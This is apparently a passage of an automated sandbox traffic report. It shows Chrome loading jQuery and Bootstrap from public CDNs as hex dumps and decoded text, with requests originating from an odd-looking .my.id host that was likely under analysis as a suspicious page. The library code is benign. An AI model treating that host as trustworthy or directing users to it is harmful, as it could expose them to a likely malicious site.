                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 2c 20 6e 61 6d 65 20 29 20 7b 0a 09 63 6c 61 73 73 32 74 79 70 65 5b 20 22 5b 6f 62 6a 65 63 74 20 22 20 2b 20 6e 61 6d 65 20 2b 20 22 5d 22 20 5d 20 3d 20 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 7d 20 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 7b 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 72 65 61 6c 20 69 4f 53 20 38 2e 32 20 6f 6e 6c 79 20 28 6e 6f 74 20 72 65 70 72 6f 64 75 63 69 62 6c 65 20 69 6e 20 73 69 6d 75 6c 61 74 6f 72 29 0a 09 2f 2f 20 60 69 6e 60 20 63 68 65 63 6b 20 75 73 65 64 20 74 6f 20 70 72 65 76 65 6e 74 20 4a 49 54 20 65 72 72 6f 72 20 28 67 68 2d 32 31 34 35 29 0a 09 2f 2f 20 68 61 73 4f 77 6e 20 69 73 6e 27 74 20 75 73 65 64 20 68 65 72 65 20 64 75 65 20 74
                                                                                                                                                    Data Ascii: , name ) {class2type[ "[object " + name + "]" ] = name.toLowerCase();} );function isArrayLike( obj ) {// Support: real iOS 8.2 only (not reproducible in simulator)// `in` check used to prevent JIT error (gh-2145)// hasOwn isn't used here due t
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 6e 73 74 61 6e 63 65 20 6d 65 74 68 6f 64 73 0a 09 68 61 73 4f 77 6e 20 3d 20 28 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 0a 09 61 72 72 20 3d 20 5b 5d 2c 0a 09 70 6f 70 20 3d 20 61 72 72 2e 70 6f 70 2c 0a 09 70 75 73 68 5f 6e 61 74 69 76 65 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 70 75 73 68 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 2c 0a 09 2f 2f 20 55 73 65 20 61 20 73 74 72 69 70 70 65 64 2d 64 6f 77 6e 20 69 6e 64 65 78 4f 66 20 61 73 20 69 74 27 73 20 66 61 73 74 65 72 20 74 68 61 6e 20 6e 61 74 69 76 65 0a 09 2f 2f 20 68 74 74 70 73 3a 2f 2f 6a 73 70 65 72 66 2e 63 6f 6d 2f 74 68 6f 72 2d 69 6e 64 65 78 6f 66 2d 76 73 2d 66 6f 72 2f 35 0a 09 69 6e 64 65 78 4f 66 20 3d 20 66 75 6e
                                                                                                                                                    Data Ascii: nstance methodshasOwn = ({}).hasOwnProperty,arr = [],pop = arr.pop,push_native = arr.push,push = arr.push,slice = arr.slice,// Use a stripped-down indexOf as it's faster than native// https://jsperf.com/thor-indexof-vs-for/5indexOf = fun


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.2.449747151.101.66.1374433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:03 UTC618OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:03 UTC612INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 69597
                                                                                                                                                    Server: nginx
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                    ETag: "28feccc0-10fdd"
                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Age: 1886285
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:03 GMT
                                                                                                                                                    X-Served-By: cache-lga21984-LGA, cache-nyc-kteb1890083-NYC
                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                    X-Cache-Hits: 903, 0
                                                                                                                                                    X-Timer: S1736326384.878232,VS0,VE1
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                                                                                    Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                                                                                                                    Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                                                                                    Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                                                                                                    Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                                                                                                                    Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                                                                                                    Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                                                                                                    Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                                                                                                                    Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                                                                                                                    Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                                                                                                                    Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    3192.168.2.449751104.18.10.2074433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:03 UTC637OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                    Host: maxcdn.bootstrapcdn.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:03 UTC954INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:03 GMT
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    CDN-PullZone: 252412
                                                                                                                                                    CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                    CDN-RequestCountryCode: US
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cache-Control: public, max-age=31919000
                                                                                                                                                    ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                                                                                    Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                                    CDN-ProxyVer: 1.06
                                                                                                                                                    CDN-RequestPullSuccess: True
                                                                                                                                                    CDN-RequestPullCode: 200
                                                                                                                                                    CDN-CachedAt: 12/04/2024 01:55:10
                                                                                                                                                    CDN-EdgeStorageId: 1067
                                                                                                                                                    timing-allow-origin: *
                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    CDN-Status: 200
                                                                                                                                                    CDN-RequestTime: 0
                                                                                                                                                    CDN-RequestId: c2195806db0a72743fda25b223f9e5b9
                                                                                                                                                    CDN-Cache: HIT
                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf47b5f211881-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    2025-01-08 08:53:03 UTC415INData Raw: 37 62 66 39 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                                    Data Ascii: 7bf9/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c
                                                                                                                                                    Data Ascii: s","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22 65 6c
                                                                                                                                                    Data Ascii: t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"el
